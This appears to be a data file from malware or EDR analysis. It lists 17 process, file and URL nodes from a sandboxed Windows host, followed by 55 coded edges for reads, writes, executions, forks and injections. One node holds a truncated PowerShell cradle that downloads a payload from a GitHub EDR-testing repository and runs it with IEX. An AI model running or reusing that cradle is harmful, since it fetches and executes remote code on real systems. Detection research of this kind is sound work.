17
MP*-nsA042.tmp
MF-C:\Users\admin\AppData\Local\Temp\3e5096359da3ff9944a9b85da8a000648c32e77d898b8966b242a332d8b30b1e.exe
MF-Files\RerSpacer710\RerSpacer710.exe
SF-C:\Users\admin\AppData\Local\Temp\Ashraf
SF-C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\audiodg
TP*-gpresult.exe
TP-Client.exe 
MP-powershell.exe
MF-Options\notepad.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP*-pestudio.exe 
MP-nethtsrv.exe
MP*-HxDSetup.exe 
MP-fd4289d63cda962af120a59a1f3a389f.exe.vir.exe 
TF-C:\Users\admin\AppData\Local\Temp\DBM_Herbstaktion_2023
MF-C:\Users\admin\AppData\Local\Temp\0crbfnw1.cmd
MP-mshta.exe
55
0 1 RD
0 2 WR
0 3 EX
0 4 RD
0 5 FR
5 1 RD
5 2 WR
5 3 WR
5 4 RD
0 6 FR
6 1 RD
6 2 EX
6 3 RD
6 4 RD
5 6 IJ
0 7 FR
7 1 RD
7 2 WR
7 3 WR
7 4 RD
5 7 UK
0 8 WR
6 8 RD
9 0 RF
6 9 ST
0 10 FR
10 1 WR
10 2 RD
10 3 WR
10 4 WR
6 10 IJ
10 8 RD
9 10 RF
11 1 RD
11 2 WR
11 3 WR
11 4 RD
6 11 IJ
11 8 WR
9 11 RF
10 11 UK
12 2 EX
12 3 WR
12 4 WR
6 12 IJ
12 8 WR
9 12 RF
13 3 WR
13 4 WR
6 13 UK
12 14 RD
12 15 WR
16 8 WR
16 9 ST
12 16 UK

